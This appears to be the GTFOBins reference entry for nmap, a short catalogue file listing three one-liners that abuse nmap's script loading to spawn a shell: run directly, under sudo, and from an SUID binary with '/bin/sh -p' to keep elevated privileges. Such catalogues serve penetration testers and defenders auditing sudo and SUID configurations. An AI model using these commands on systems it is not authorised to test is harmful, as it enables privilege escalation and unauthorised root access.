GTFOBins.github.io/_gtfobins/nmap.md
2018-08-19 11:20:37 +01:00

576 B

functions
execute-interactive sudo-enabled suid-enabled
description code
Echoing of input characters is disabled. TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF nmap --script=$TF
description code
Echoing of input characters is disabled. TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF sudo nmap --script=$TF
description code
Echoing of input characters is disabled. TF=$(mktemp) echo 'os.execute("/bin/sh -p")' > $TF ./nmap --script=$TF